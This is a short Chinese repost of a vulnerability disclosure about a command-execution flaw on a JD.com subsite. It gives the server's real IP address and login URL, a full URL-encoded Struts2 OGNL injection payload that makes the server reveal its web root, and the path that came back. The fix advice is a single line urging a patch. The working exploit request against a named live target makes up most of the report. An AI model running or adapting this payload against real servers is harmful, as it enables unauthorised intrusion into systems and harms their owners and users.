京东商城某分站命令执行漏洞可危及内部网络下载

京东商城某分站命令执行漏洞可危及内部网络

问题出在211.152.123.83，http://211.152.123.83/login.jhtml.

http://211.152.123.83/login.jhtml?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29}

/export/data/tomcatRoot/jq1.360buy.com/

修复方案：

赶紧打补丁吧

上一篇：爱帮网主站SQL注入下载

下一篇： [dede教程]DEDE整站动态化或整站静态化设置方法,织梦栏目批量静态/动态方法

当前位置：站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细

京东商城某分站命令执行漏洞可危及内部网络下载

修复方案：

推荐文章

推荐网站